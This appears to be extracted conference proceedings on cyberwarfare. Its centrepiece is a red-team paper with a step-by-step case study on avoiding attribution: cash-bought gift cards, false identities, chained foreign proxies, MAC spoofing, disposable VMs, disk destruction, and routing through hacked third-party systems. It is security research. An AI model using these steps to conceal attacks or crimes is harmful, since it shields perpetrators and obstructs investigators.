attacks that have already occurred. When the internet was initially developed the idea was to create a<br />
simple communication scheme which was simple and open, allowing for evolution into a much more<br />
complex animal. Having gone through several revisions, it is time to update the protocols and<br />
methods used daily to decrease the ability and relative ease of cyber attack. This is of course going to<br />
be accomplished by setting long term strategic goals, and then funding technological initiatives which<br />
are then in turn supported by policy both domestic and internationally. The first step in supporting this<br />
strategy is to fund the minds that are interested in forming a safer internet. A internet which limits the<br />
211
Christopher Perr<br />
anonymity of attackers, separates classified networks from the unclassified, develops systems where<br />
security is integral in the design, and creates a robust network which recovers gracefully from error<br />
and attack while limiting the scope of that attack at every level. This is where funding is necessary for<br />
new research an innovation in the relatively immature field of computing and networks.<br />
7. Conclusion<br />
Cyberspace is dangerous and scary. The borders are vast, and the landscape is constantly changing.<br />
Fortunately the possibilities of operating in cyberspace offers excellent rewards and given an<br />
appropriate but flexible strategy, reinforcing policy measures, and the drive to guide technological<br />
development cyberspace can also be a safe place to operate. This paper should serve as a call to<br />
make strides in these three areas, and to humbly offer up a base guide to tackling both present and<br />
future issues in cyberspace.<br />
References<br />
Agence France-Presse, US military prepares for 'cyber command:' official | ABS-CBN News | Latest Philippine<br />
Headlines, Breaking News, Video, Analysis, Features. ABS-CBN News. Available at: http://www.abscbnnews.com/technology/04/24/09/us-military-prepares-cyber-command-official<br />
[Accessed September 11,<br />
2010].<br />
Alexander, K., Advanced Questions for Lieutenant General Keith Alexander, USA, Nominee for Commander,<br />
United States Cyber Command, Available at:<br />
http://docs.google.com/viewer?a=v&q=cache:Kcm4Wm7WxDcJ:armedservices.senate.gov/statemnt/2010/04%2520April/Alexander%252004-15-<br />
10.pdf+Advance+Questions+for+Lieutenant+General+Keith+Alexander,+USA+Nominee+for+Commander&<br />
hl=en&gl=us&pid=bl&srcid=ADGEESii_NfX8DuWogAeIT3BXixKWHsUgQjUlYpebRb4XQjwsDRhXLVTbXwl<br />
aGTT7EulMH-DBJeo4rim_l2kT3M32rWC7AxmMzROsxLQwQVOYDVY2Gi9pKohKDV89kkb-<br />
GHIOMwFll3A&sig=AHIEtbSnKTroECzRqeFhTGnXyvf4JMu62A [Accessed September 11, 2010].<br />
Arquilla, J., 2007. Information strategy and warfare : a guide to theory and practice, New York: Routledge.<br />
Baocun, W. & Fei, L., INFORMATION WARFARE. Available at:<br />
http://www.fas.org/irp/world/china/docs/iw_wang.htm [Accessed September 11, 2010].<br />
Campen, A., 1992. The first information war : the story of communications, computers, and intelligence systems<br />
in the Persian Gulf War, Fairfax Va.: AFCEA International Press.<br />
Clarke, R., 2010. Cyber war : the next threat to national security and what to do about it 1st ed., New York: Ecco.<br />
Department of Homeland Security, DHS | Office of Cybersecurity and Communications. Available at:<br />
http://www.dhs.gov/xabout/structure/gc_1185202475883.shtm [Accessed September 11, 2010].<br />
Fulghum, Israel used electronic attack in air strike against Syrian mystery target - ABC News. Available at:<br />
http://abcnews.go.com/Technology/story?id=3702807&page=1 [Accessed September 11, 2010].<br />
Leyden, J., 2008. Estonia fines man for DDoS attacks • The Register. The Register. Available at:<br />
http://www.theregister.co.uk/2008/01/24/estonian_ddos_fine/ [Accessed September 11, 2010].<br />
Markoff, J., Google Asks N.S.A. to Investigate Cyberattacks - NYTimes.com. Available at:<br />
http://www.nytimes.com/2010/02/05/science/05google.html?fta=y [Accessed September 11, 2010].<br />
Markoff, J. & Barboza, D., Chinese <strong>Academic</strong>s’ Paper on Cyberwar Sets Off Alarms in U.S. - NYTimes.com.<br />
Available at: http://www.nytimes.com/2010/03/21/world/asia/21grid.html?_r=1 [Accessed September 11,<br />
2010].<br />
Markoff, J., Sanger, D.E. & Shanker, T., CYBERWAR - In Digital Combat, U.S. Finds No Easy Deterrent - Series<br />
- NYTimes.com. Available at:<br />
http://query.nytimes.com/gst/fullpage.html?res=9404E4DE123BF935A15752C0A9669D8B63 [Accessed<br />
September 11, 2010].<br />
Miller, F.P., Vandome, A.F. & McBrewster, J., 2010. Information Operations Roadmap.<br />
Miniwatts Marketing Group, United States Internet Usage, Broadband and Telecommunications Reports -<br />
Statistics. Available at: http://www.internetworldstats.com/am/us.htm [Accessed September 11, 2010].<br />
msnbc.com staff, U.S. eyes N. Korea for ‘massive’ cyber attacks - Technology & science - Security - msnbc.com.<br />
Available at: http://www.msnbc.msn.com/id/31789294 [Accessed September 11, 2010].<br />
Office of Force Transformation, 2005. Implementation of Network-Centric Warfare, Office of Force<br />
Transformation.<br />
Reuters, FBI probes cyber attack on Citigroup: report | Reuters. Available at:<br />
http://www.reuters.com/article/idUSTRE5BL0I320091222 [Accessed September 11, 2010].<br />
Trias, E.D. & Bell, B.M., Cyber This, Cyber That . . . So What? Air & Space Power Journal, Spring 2010.<br />
Available at: http://www.airpower.maxwell.af.mil/airchronicles/apj/apj10/spr10/trias.html [Accessed<br />
September 11, 2010].<br />
Wallace, R., 2009. Spycraft : the secret history of the CIA's spytechs, from communism to Al-Qaeda, New York:<br />
Plume.<br />
Waterman, S., Analysis: Who cyber smacked Estonia? - UPI.com. Available at:<br />
http://www.upi.com/Business_News/Security-Industry/2007/06/11/Analysis-Who-cyber-smacked-<br />
Estonia/UPI-26831181580439/ [Accessed September 11, 2010].<br />
212
Catch me if you can: Cyber Anonymity<br />
David Rohret and Michael Kraft<br />
Joint Information Operations Warfare Center (JIOWC) Texas, USA<br />
drohret@ieee.org<br />
mkraft5@csc.com<br />
Abstract: Advances in network security and litigation have empowered and enabled corporations to conduct<br />
Internet and desktop surveillance on their employees to increase productivity and their customers to gain valuable<br />
marketing data. Governments have spent billions to monitor cyberspace and have entered agreements with<br />
corporations to provide surveillance data on adversarial groups, competitors, and citizenry (Reuters, 2010). The<br />
Chinese government’s monitoring of the Internet (Markoff, 2008), the United Kingdom’s plan to track every email,<br />
phone call, and website visited (Whitehead, 2010), and the recent announcement from the United States that a<br />
program named the “Perfect Citizen” (Bradley, 2010) will be used to identify those committing cybercrimes and<br />
terrorist activities. These government surveillance programs have many concerned that anonymity on the Internet<br />
is non-existent and that real objectivity and candidness found on news, educational, and research websites is<br />
being replaced with a “big brother” atmosphere; preventing open discussion and information transfers between<br />
domains. Although the initial intent of network and Internet monitoring may be honourable; terrorists, hackers,<br />
and cyber-criminals already have access to the necessary tools and methodologies to continue in their activities<br />
unabated. State and non-state adversaries can use these same tools and methodologies to divert malicious and<br />
offensive actions towards a common adversary, avoiding attribution while increasing tensions among non-actors.<br />
Concerned educators, scientists, and citizens are rebelling against Internet monitoring providing the impetus for<br />
developers and entrepreneurs to create methods, tools, and virtual private networks that provide secrecy for<br />
those wishing to remain invisible; avoiding detection from employers, law enforcement, and other government<br />
agencies (Ultimate-Anonymity, 2010). The intent of this research is to first briefly identify the efforts required by<br />
governments to track and monitor individuals and groups wishing to remain anonymous within the cyber community.<br />
The authors define “cyber community” as the boundaries within any tool, process, or mechanism utilizing<br />
Transmission Control Protocol (TCP)/ Internet Protocol (IP), or similar protocols that allow for the transfer and<br />
aggregation of information and data. In contrast, the authors will then identify a process to remain wholly anonymous<br />
in the context of an internet identity. This will be demonstrated in a step-by-step case study using a ”paranoid”<br />
approach to remaining anonymous.<br />
Keywords: anonymity, network, internet surveillance, foreign proxy, hacker, big brother<br />
1. Terms defined<br />
The term Internet anonymity, and the abstract or hypothetical optimum of remaining anonymous, have<br />
differing definitions based on the “completeness” of anonymity desired. In several definitions “anonymous”,<br />
is simply remaining obscure (Answers.com, 2010), and not necessarily completely hidden<br />
from site. In other definitions, anonymous refers to remaining nameless, without shape or form (wordnetweb.princeton.edu,<br />
2010), and this is the definition the authors have used throughout this paper.<br />
This theme also extends to other terms that describe deception, the destruction of data or misdirection;<br />
specifically, the completeness of the action being described. The word “government” will also be<br />
used in a manner that includes all government entities, including law enforcement, military, and intelligence<br />
agencies.<br />
2. Overview<br />
Network-centric red teams are charged with emulating known adversaries and hackers (remote and<br />
insider threats) using, for the most part, only open-source and publically accessible tools and software.<br />
Unlike penetration testers, who use exploits to validate vulnerabilities, red teams are responsible<br />
for viewing networks or systems from every angle to defeat defences in place. This will include,<br />
but is not limited to, physical security, biometrics, social engineering, and of course, preventing the<br />
blue team from assigning attribution to the red teams actions. In this type of security stress-test a client<br />
is able to fully realize their systems security posture, which encompasses much more than a vulnerability<br />
scan and penetration test.<br />
Governments and corporations have realized the advantages of communications and data transfers<br />
via the Internet for economical and defensive purposes. They have also realized the dangers and<br />
costs of cyber crimes, malicious hacking, espionage, and cyber warfare; developing new technologies<br />
and implementing new legislation to defend networks and to trace/track attacks to their electronic<br />
point of origin (EPO). Without verification and validation courts will not convict and governments are<br />
unwilling to counter attack as clear attribution cannot be assigned. In order to remain anonymous or<br />
213
David Rohret and Michael Kraft<br />
assign blame to another party, the authors use the Praestigiae Cone (Rohret & Jett, 2009) displayed<br />
in Figure 1. The Praestigiae Cone can be visualized as seven protective layers (cone architecture)<br />
used in multiple steps to allow hackers, adversaries, or any other group to operating from a cloaked<br />
vantage point. The organization or individual attempting to identify what the shields are hiding can<br />
attack any of them at one time, but cannot move from one layer to the next without first solving the<br />
initial “who-is” puzzle for the layer they have identified. Making the task of identifying the actual<br />
user(s) more difficult is that each shield is time-sensitive; creating a fast moving defensive environment<br />
that is held hostage to a cyber criminal’s (or users) schedule.<br />
Figure 1: The Praestigiae Cone is used to hide and deceive one from those trying to identify the<br />
original source of an attack or network traffic (Rohret & Jett, 2009<br />
As difficult as it appears for law enforcement and government agencies to crack all seven layers, it<br />
only takes one mistake or missed-step by an adversary or hacker to allow investigators to see their<br />
true identity. Therefore, the authors have provided a brief description of known capabilities to establish<br />
the requirement for an adversary to take the seemingly paranoid precautions identified later in this<br />
paper in order to remain anonymous.<br />
3. Identifying and tracking internet users<br />
“...the FBI successfully infected the anonymous source's computer, and they soon discovered<br />
his identity” (Begun, 2009).<br />
In order to quantify the actions taken to remain anonymous we must first identify the many ways an<br />
individual or group can be located, tracked, and discovered. By no means are the methods described<br />
below solely used for cyber crimes or cyber warfare, but they are a major part of a government’s arsenal<br />
in fighting cyber crime and dissidents. Because there are so many different tools and techniques<br />
used by different governments and agencies, the authors have generalized techniques using<br />
specific examples to represent the greater capabilities. This brief overview will help to demonstrate<br />
why a paranoid approach is required to protect an anonymous identity on the Internet.<br />
Trojans, Beacons, and Worms<br />
The above quote from Daniel Begun illustrates one way to identify illegal media downloads or snoopy<br />
hackers. The process is as easy as providing interesting material on known download sites with embedded<br />
Trojans or beacons that notify law enforcement of the violation. Although effective, it’s difficult<br />
for government agencies to target specific groups or individual violators as this process is more of a<br />
214
David Rohret and Michael Kraft<br />
reverse phishing expedition. For targeting specific groups such as cyber criminals or adversarial governments,<br />
similar techniques would be used with live data or in a well designed honeypot that seemingly<br />
held the type of data the targeted group would maintain on their site. The music industry has had<br />
minor successes using these techniques (Associated Press, 2005).<br />
Financial Transactions<br />
Financial transactions can easily be associated with an individual anywhere they take place. For an<br />
international economy to work, governments and corporations, often at odds with one-another, must<br />
work together to prevent crimes that threaten markets and currencies. Because the world has rapidly<br />
become digitized credit cards, Internet paying services, and smart phone purchases allow anyone<br />
with a bank account to be a consumer. Furthermore, most businesses and banks now utilize video<br />
surveillance at the point of transaction creating a scenario where even cash purchases of a serialnumbered<br />
commodity or a financial document can lead investigators to a digital picture of the perpetrator.<br />
The United States agency, The Financial Crimes Enforcement Network (FinCEN) was established<br />
in 1990 and is considered the leading expert in solving crimes involving financial transactions,<br />
to include cyber crimes (Kimery, 2010; FinCEN, 2010).<br />
Digital and Cellular Communications<br />
"It's time for you to get some new cell phones, quick," was the warning given to Brian Ross and his<br />
ABC News investigation team (Ross, 2006) by someone they considered an NSA insider. This older<br />
news story describes an agency leak that identified how intelligence agencies, (and presumably law<br />
enforcement agencies) are able to track individuals using telecommunications for activities they (the<br />
agency) deem interesting or counter to national security. Radio Frequency (RF) triangulation to pinpoint<br />
locations of smart phones and other on-line digital devices is also possible with the use of good<br />
spectrum analyzers and a direction finder. This applies to 802.11, 802.16, GSM, CDMA and other<br />
Internet Protocol (IP) over radio and wireless standards.<br />
Tracking Internet Traffic<br />
The most common method of identifying malicious Internet activity and attempting to identify the culprit<br />
is through network and Internet surveillance. Intrusion detection systems, intrusion prevention systems,<br />
intelligent and stateful firewalls, packet sniffers, etc, provide network administrators and cyber<br />
crime investigators powerful tools for identifying attack signatures and sophisticated pattern analysis’<br />
that help investigators attribute an attack or malicious actions to a specific group or individual. This is<br />
not to say they know the actual identity of the group or individuals involved, but rather, they can match<br />
patterns of attacks or actions with enough confidence to suggest that the same perpetrators were involved.<br />
These capabilities have become more precise in recent years as corporations and governments<br />
cooperate in sharing information and sensor data. For example, the marriage between the<br />
search engine giant Google and the NSA made headlines sending shock waves through the Internet<br />
community creating worries that anyone can be “spied” on at any time (Reuters, 2010). An adversary<br />
or malicious hacker must also assume that international arrangements and agreements have also<br />
been implemented providing world-wide coverage and tracing capabilities.<br />
Computer Forensics<br />
Possession of a suspect’s computer is the golden egg for investigators. The term computer forensics,<br />
for use in this paper, refers to identifying incriminating evidence on the suspects system or a storage<br />
device used by the suspect. Entire computer laboratories are dedicated to forensic analysis for identifying<br />
incriminating evidence; ranging from simple low-tech techniques to highly sophisticated electron<br />
interferometry. An example of a low-tech analysis would consist of the capture of a system that is still<br />
running and accessible; whereas electron interferometry involves reading open and closed memory<br />
gates on a system’s memory at temperatures below negative 60 Celsius, even if the system has been<br />
shut down for several minutes (Vourdas & Sanders, 1998).<br />
Physical Investigations<br />
“Feet” on the ground to identify patterns and locations are part of the final stage of an investigation to<br />
identify and/or catch a suspect. This includes using video surveillance from Internet cafes frequented<br />
215
David Rohret and Michael Kraft<br />
by the suspect or an old fashioned stake-out to catch them in the act. Cyber crime investigations are<br />
common place and many are high profile, prompting law enforcement agencies to allocate significant<br />
resources to rapidly solve cases.<br />
4. A paranoid approach to remaining anonymous<br />
Why a paranoid approach to anonymity? Governments, adversaries, corporations, cyber criminals,<br />
even cheating spouses require a repeatable process they can employ to accomplish sensitive activities<br />
across the World Wide Web without detection or retribution. In a recent article prepared for the<br />
North Atlantic Treaty Organization (NATO) Parliamentary Assembly (Myrli, 2010) the cost of cyber<br />
crimes to governments and corporations is reported to be over US $100B annually. In response to<br />
cyber crime, governments and corporations spend billions more on technology and methodologies to<br />
identify, track, and prosecute cyber criminals (Fenwick, 2010). Not only have governments increased<br />
expenditures and resources to combat cyber crime, there is now unprecedented cooperation among<br />
governments and corporations to provide data and information sharing to identify and/or capture offenders<br />
(Golubev, 2005). Therefore, for an adversary or cyber criminal to successfully use the internet<br />
for nefarious reasons and remain anonymous, they must take a holistic view of the security available<br />
to their intended targets; that is to say, they must assume each capability is available and successfully<br />
deployed. Just as a network security officer does not have the luxury of only defending against some<br />
or most of the vulnerabilities on their network, a cyber criminal or cyber warrior cannot depend on a<br />
law enforcement agency to only use some of the methods described in section 3.<br />
This paper is the result of research into adversarial capabilities in cyber warfare, specifically, how a<br />
network-centric red team, acting as the adversary, would prevent positive attribution after conducting<br />
network reconnaissance or an attack. The following case study reflects precautions and actions used<br />
to create the shields in the Praestigiae Cone, described in Figure 1; using combinations of publically<br />
available technology, services, and research. Figure 2 outlines the process of achieving the seven<br />
shields, resulting in complete anonymity. The details are explained using a scenario based on an actual<br />
case study involving a red team assessment on an enterprise network.<br />
Figure 2: A process for remaining anonymous in cyber space<br />
Scenario: The red team’s goal was to emulate a hackers capability to remotely identify and disable an<br />
automated network-controlled surveillance system that included wireless video, fence and ground<br />
sensors, autonomous vehicle sentries, and network security; without being identified as the adver-<br />
216
David Rohret and Michael Kraft<br />
sary. The red team assumed that all networks were monitored and Internet service providers, search<br />
engines, and even proxy services would provide information to authorities in a timely manner. Each<br />
action taken by the red team, and all services purchased and used, are publically available and operating<br />
in a legal capacity. The following steps provided Internet and network anonymity, allowing the<br />
red team to accomplish its mission without allowing security managers to assign attribution to the attack.<br />
Physical Security and Financial Shields<br />
The red team’s first step was to build laptop systems specifically for their requirement. This included<br />
downloading free VM software for the installation of multiple operating systems. By using freely distributed<br />
VM software, the red team was able to avoid having information identifying their use of VM<br />
software through registration services or processes (Oracle, 2010). Operating systems already configured<br />
for use in a VM environment were also available for public download and each download and<br />
installation was accomplished from a non-authenticating Internet cafe. Two anonymity proxy services<br />
were required and were purchased using two separate MasterCard gift cards that were separately<br />
purchased with cash at two convenience stores that were found not to be using video surveillance.<br />
Virtualization and Spoofing Shields<br />
Creating a system providing protection against evidence retrieval is vital for a red team emulating adversarial<br />
techniques. Virtual operating systems provide developers and administrators the capability to<br />
create instances of an entire network for testing and evaluation, similarly, cyber criminals and adversaries<br />
use virtual networks for pre-exploit testing and as disposable systems following an attack or<br />
exploitation. If all other layers of anonymity fail, it is imperative that attribution cannot be determined<br />
from information, logs, or data found on the attackers host system. In this case study, our red team<br />
used multiple pre-built virtual machines on re-usable host systems, creating temporary and disposable<br />
attack platforms. Continuing our paranoid approach, we used open-source resources to download<br />
and install the following files using a false identify:<br />
Virtual Machine Hosting Software: The authors downloaded Microsoft’s Virtual PC 2007 software.<br />
With Microsoft Virtual PC 2007, you can create and run one or more virtual machines (each with<br />
its own operating system) on a single computer. This provides you with the flexibility to use different<br />
operating systems on a single host platform (Microsoft, 2010).<br />
Virtual Machine Images: Virtual operating system images can be obtained in several ways; they<br />
can be loaded directly into the VM system (using un-registered software) or downloaded already<br />
built. Windows XP or Vista VM images are available at no cost from the National Institute of Standards<br />
and Technology (NIST, 2010), and a Linux distribution was also obtained from an opensource<br />
location (Back|Track-Linux.org, 2010). Hacker forums, how-to publications, and trial<br />
downloads also provide sources locations for acquiring operating systems to populate your virtual<br />
machines without a financial or registration trail.<br />
Host and VM System MAC Spoofing: Every network interface card (NIC) is assigned a unique<br />
serial number called a media access control (MAC) address. An investigator or network security<br />
officer can trace a MAC address in a similar way that an IP address is traced by simply using a<br />
packet sniffing tool, like Wireshark, and filtering traffic by the MAC. Many novice hackers or careless<br />
cyber criminals will neglect spoofing MAC addresses prior to an attack, and just as often, forget<br />
to change them back to the original following an attack. In the red team’s quest to eliminate<br />
any trace of their attacking systems on their host platforms, they used publically available freeware<br />
called Spoofmenow.exe (SourceForge, 2010) to change the MAC addresses of both the VM<br />
system and their host platforms. Once the red teams actions were completed (for each session),<br />
they returned the host system to the original MAC address and deleted the VM system. This action<br />
would prevent investigators from identifying the host system as the computer used for an attack,<br />
even if no other evidence was available. It was necessary to change the VM system’s MAC<br />
address for two reasons; first, changing the MAC address to a manufacturer that reflected the location<br />
of the proxy server used for the attack, created a better deception of where the attack<br />
originated from. Secondly, and just as importantly, to avoid identifying the system used as a VM<br />
system. Most vulnerability scanners will identify the MAC address of a VM system as a virtual machine.<br />
217
Proxy and Remailer Shields<br />
David Rohret and Michael Kraft<br />
The side effect of increased capabilities by law enforcement is an increase in on-line services to help<br />
defeat law enforcement capabilities, such as anonymous proxies and remailers. Proxies are servers<br />
that act as go-betweens, making requests for data on behalf of clients. A proxy receives a "request"<br />
for a file, website, or other resource from a client, connects to the remote site, and obtains the information<br />
sending it back to the client. Remote proxies can allow you to surf the Web privately without<br />
being monitored and are widely used by individuals who download copyrighted media or those who<br />
circumvent network security measures in order to view blocked Websites (Hazel Morgan, 2010).<br />
An anonymous remailer is an email service which receives client messages (with embedded instructions<br />
on where to send them) and then forwards the messages without revealing where they originally<br />
came from. By not maintaining a users list or a log of the addresses their messages were sent to, a<br />
remailer can ensure any message which has been forwarded leaves no internal information behind<br />
that could be used to break identity confidentiality (Wikipedia, 2010).<br />
Two proxy services were used by the red team; the first proxy service, Ultimate-Anonymity (Ultimate-<br />
Anonymity, 2010), was purchased using the first cash gift card and a false identity at a nonauthenticating<br />
wireless cafe. Red team members quickly set their proxy location to a proxy in India via<br />
an encrypted VPN. Using an on-line IP lookup after starting the anonymous proxy service the red<br />
team confirmed they were seen on the Internet as originating from the location in India, as shown in<br />
Figure 3.<br />
Figure 3: This screen capture was acquired using an IP lookup from the host system and identifies<br />
the host is associated with an IP address from an Internet service provider located in India<br />
and even provides the information in the host ISP’s primary customer languages<br />
The second proxy service, HideMyAss.com (HMA), was purchased using the second gift card from<br />
another non-authenticating wireless cafe while connected through the first proxy, using a different<br />
false identity (HideMyAss.com, 2010). HMA’s user-friendly interface allowed the red team to choose<br />
multiple proxies in the Netherlands and Russia, changing IP addresses every 10 minutes.<br />
Although anonymous proxy services advertise they do not maintain user logs and delete user information<br />
in a timely manner, it was assumed by the red team the anonymous proxy services would cooperate<br />
with investigators. Therefore the red team would not use each proxy service for more than<br />
one session, repeating the process for each follow-on action, using different proxy locations, session<br />
locations, and new identities.<br />
218
Data (Evidence) Removal Shield<br />
David Rohret and Michael Kraft<br />
There are various levels of paranoia which will dictate how one might try and destroy the computer<br />
evidence. One might have little paranoia and decide to just delete the virtual machine from the computer.<br />
A more nervous approach might include using a disk cleaner wiping a hard drive in accordance<br />
with the DoD 5220.22-M standard (www.usaid.gov, 2010), which features multiple overwrites of random<br />
characters. Open source programs like Darik's Boot and Nuke (DBAN) is a self-contained boot<br />
disk that securely wipes the hard disks of most computers. DBAN will automatically and completely<br />
delete the contents of any hard disk that it can detect, which makes it an appropriate utility for bulk or<br />
emergency data destruction (Sourceforge, 2010). Lastly, after completing disk scrubbing, the extreme<br />
case of paranoia might include destroying the computer by physically damaging the hard drives and<br />
memory.<br />
Location/Deception and Time Shields<br />
As discussed earlier, time is the adversary’s or cyber criminal’s ally. The end goal is to accomplish an<br />
action without being identified or having it attributed to your team. By using a disciplined approach<br />
and restricting the amount of time each session is executed, each proxy service is used, and an identity<br />
is held, investigators will be kept busy allocating resources to identify computers and users that no<br />
longer exist. Even if investigators are able to eventually locate one of the EPOs, the perpetrator will<br />
have completed their mission and moved onto a new location with a new identity. Solving computer<br />
crimes requires resources and specific skill sets that are not always readily available even to the most<br />
advanced cyber crime organizations. By remaining difficult to trace and providing multiple targets that<br />
are easily erased, authorities will not be able to focus their efforts in a timely enough manner to locate<br />
and positively identify the offender.<br />
The key component of keeping time as your ally is preventing a positive identification of your location.<br />
By location the authors refer to both the physical location of the attacker and their perceived location.<br />
Earlier we discussed the use of multiple non-authenticating Internet cafes and the use of multiple foreign<br />
proxies, one tunneled through the other, but there are other methods to hide your true locations;<br />
the use of third-party hackers and on-line resources that provide exploitable computers. Third-party<br />
hacking services are available and can be purchased using a gift card while logged onto a proxy service.<br />
Furio Gaming (Furio Gaming, 2010) is one such service that will either hack a system for you or<br />
will provide you the tools to do so. This service represents itself as a gaming and hacking company<br />
and is located in a foreign country providing a layer of anonymity in itself. Other on-line services, such<br />
as Shodanhq.com (SHODAN, 2010), provide an easy-to-use research tool allowing hackers to identify<br />
systems worldwide that are exploitable in every country. By identifying and exploiting a vulnerable<br />
system in a country that may not cooperate with the country you are working in, a cyber criminal can<br />
execute their objectives with little fear of attribution. Other methods for individuals or organizations<br />
with greater resources would be to setup and configure their own anonymous proxies in countries and<br />
locations that have liberal or non-existent cyber laws. For large scale cyber attacks or highly profitable<br />
schemes, this method may be more applicable and more robust.<br />
5. Summary<br />
The inexpensive solution to cyber anonymity outlined in this case study can easily be implemented<br />
with minimal resources and without expert skill levels. Movies and television shows, such as “24”<br />
(IMDB 24, 2010) and “Live Free or Die Hard” (IMDB Live Free or Die Hard, 2010) depict governments<br />
and advanced cyber techniques that can pinpoint network and Internet users in real time; but for the<br />
most part, these capabilities do not exist. The fact remains tracking a cyber criminal requires extensive<br />
resources and is a time consuming process involving multiple agencies and governments. It is<br />
also imperative that government decision makers be wary of assigning attribution to a specific country<br />
or group for an attack or malicious action as the current state of cyber defence and investigations rely<br />
heavily on the offending group to make a mistake that would provide positive identification. The authors<br />
do not intend to imply such capabilities cannot be or are not being developed, but rather the current<br />
state of Internet security and cyber laws do not provide sufficient capabilities and processes for<br />
positive attribution. As this case study has demonstrated, even if authorities are able to follow an attack<br />
or cyber crime to its electronic point of origin, that trail will only lead to a non-traceable false identity.<br />
Catch me if you can.<br />
219
References<br />
David Rohret and Michael Kraft<br />
Answers.com. http://www.answers.com/topic/anonymity Anonymity definition. Oct 2010.<br />
Associated Press. Teen Convicted of Illegal Net Downloads. http://www.msnbc.msn.com/id/7122133/. March 7,<br />
2005.<br />
Back|Track-Linux.org. VMware Fusion 3.1. http://www.backtrack-linux.org/downloads/. Oct 2010.<br />
Begun, Daniel, A. FBI Uses Spyware to Capture Cyber Criminals. Hothardware.com, Monday, April 20, 2009.<br />
http://hothardware.com/News/FBI-Uses-Spyware-to-Capture-Cyber-Criminals/. 1 Oct 2010.<br />
Bradley, Tony. NSA 'Perfect Citizen' Raises 'Big Brother' Concerns, PC World, July 08, 2010 02:02 PM ET,<br />
http://www.networkworld.com/news/2010/070810-nsa-perfect-citizen-raises-big.html. Oct 2010.<br />
Fenwick, Samual, Dr. Cyber security – believe the hype? Industrial Fuels and Power.<br />
http://www.ifandp.com/article/006583.html. August 18, 2010.<br />
FinCEN. http://www.fincen.gov/. Oct 2010.<br />
Furio Gaming. http://www.furiogaming.com/index.php?page=home. Oct 2010.<br />
Golubev, Vladimir. International Cooperation in Fighting Cybercrime. Computer Crime Research Center,<br />
http://www.crime-research.org/articles/Golubev0405. April 16 2005.<br />
Hazel Morgan, e. C. (2010, March). Information on How Proxies Work. Retrieved October 12, 2010, from eHOW:<br />
http://www.ehow.com/facts_6054712_information-proxies-work.html.<br />
HideMyAss.com; Anonymous remailer and proxy service, http://www.HideMyAss.com. April 13, 2010.<br />
IMDB. 24 (2001 - 2010). http://www.imdb.com/title/tt0285331/. Oct 2010.<br />
IMDB. Live Free or Die Hard (2007). http://www.imdb.com/title/tt0337978/. Oct 2010.<br />
Kimery, Anthony. Big Brother Wants to Look in your Bank Account<br />
http://www.wired.com/wired/archive/1.06/big.brother_pr.html. 25 Sep 2010.<br />
Markoff, John. Surveillance of Skype Messages Found in China. New York Times: Internet. 1 October, 2008.<br />
Microsoft. Microsoft Virtual PC 2007. http://www.microsoft.com/downloads/en/details.aspx?FamilyId=04D26402-<br />
3199-48A3-AFA2-2DC0B40A73B6&displaylang=en. Oct 2010.<br />
Myrli, Sverre. 173 DSCFC 09 E bis – NATO and Cyber Defence. NATO Parliamentary Assembly,<br />
http://www.nato-pa.int/default.asp?SHORTCUT=1782. Sep 10 2010.<br />
NIST. National Institute of Standards and Technologies. http://csrc.nist.gov/ Oct 2010.<br />
Oracle. Oracle VM VirtualBox. http://dlc.sun.com/virtualbox/vboxdownload.html. Oct 2010.<br />
Reuters. Google, NSA to team up in cyberattack probe. February 4, 2010.<br />
Rohret, David, M. And Jett, Andrew. Red Teaming; A Guide to Non-kinetic Warfare. 2009.<br />
Ross, Brian. Federal Source to ABC News: We Know Who You're Calling. ABC News.<br />
http://blogs.abcnews.com/theblotter/2006/05/federal_source_.html. May 15, 2006.<br />
SHODAN. http://www.shodanhq.com/. Oct 2010.<br />
Sourceforge. (n.d.). Darik's Boot And Nuke (DBAN). http://www.dban.org/. Oct 2010.<br />
SourceForge. http://sourceforge.net/projects/spoof-me-now/files/Spoof-Me-<br />
Now%20%28No%20Installer%29.zip/download. September 2010.<br />
Ultimate-Anonymity. Anonymous remailer and proxy service. http://www.ultimate-anonymity.com/ July 7, 2010.<br />
USAid.gov. www.usaid.gov. http://www.usaid.gov/policy/ads/500/d522022m.pdf. October 2010.<br />
Vourdas, A., and Sanders, B. Determination of quantized electromagnetic-field state via electron interferometry<br />
1998 Europhys. Lett. 43 659 doi: 10.1209/epl/i1998-00414-0.<br />
Whitehead, Tim. Every email and web site to be stored. Telegraph.co.uk.<br />
http://www.telegraph.co.uk/technology/news/8075563/Every-email-and-website-to-be-stored.html 20 Oct<br />
2010.<br />
Wikipedia. (2010, July 14). Anonymous remailer. Retrieved October 12, 2010, from Wikipedia:<br />
http://en.wikipedia.org/wiki/Anonymous_remailer.<br />
Worldnet. the State of being anonymous; nameless. http://wordnetweb.princeton.edu/perl/webwn?s=anonymity:<br />
Oct 2010.<br />
220
Neutrality in the Context of Cyberwar<br />
Julie Ryan 1 and Daniel Ryan 2<br />
1 The George Washington University, Washington, USA<br />
2 National Defense University, Washington, USA<br />
jjchryan@gwu.edu<br />
ryand@ndu.edu<br />
Abstract: This paper will examine the legal antecedents of the concepts of neutrality and current enforceability of<br />
declarations of neutrality in the context of information operations amongst belligerents. This is a non-trivial point<br />
of understanding, given the potential for belligerents to use and abuse infrastructure elements owned and/or<br />
operated by nation states desiring to remain neutral. The analysis will consider the instantiated concepts of<br />
neutrality, the potential for expanding or contracting the concepts of neutrality in the context of cyberwar, and the<br />
possibility of erosion of neutrality in cyberwar scenarios. We have a notion enshrined in international law that<br />
says that you don't lose your neutrality if belligerents use your telephone lines or telegraph lines to communicate<br />
even if they are crossing your territory, even if they are passing operational orders. The problem with cyberwar is<br />
that they are potentially not just transferring orders but also potentially weapons -- cyber-weapons. So it becomes<br />
a more complex problem and the challenge is to understand at what point the nation state should be required to<br />
act, or if such a point exists at all. This analysis will examine the intersection between technology and law in<br />
regards to this issue.<br />
Keywords: neutrality; law of armed conflict; international humanitarian law; cyberwar<br />
1. War and the laws of armed conflict<br />
During less than one percent of the last two million or so years of human evolution has agriculture and<br />
animal husbandry replaced the hunter-gatherer existence as a characteristic way of life. (Gat 2006, p.<br />
4) During the hunter-gatherer phase, humans engaged in endemic primitive warfare. (Keegan 1193,<br />
p. 5 and pp. 115ff) As technology evolved, it influenced – and was influenced by – warfare, producing<br />
revolutions in military affairs. (Boot 2006, p. 8) The longbow, stirrups, gunpowder, conoidal bullets,<br />
machine guns, aircraft, radar, sonar, rockets and spacecraft, and now computers and precisionguided<br />
weapons, are but a small sample of the technologies that have continuously changed the face<br />
of warfare throughout history. As warfare became the province of nation-states, belligerencies<br />
between and among nations led to some states declaring their intent to remain neutral, and the<br />
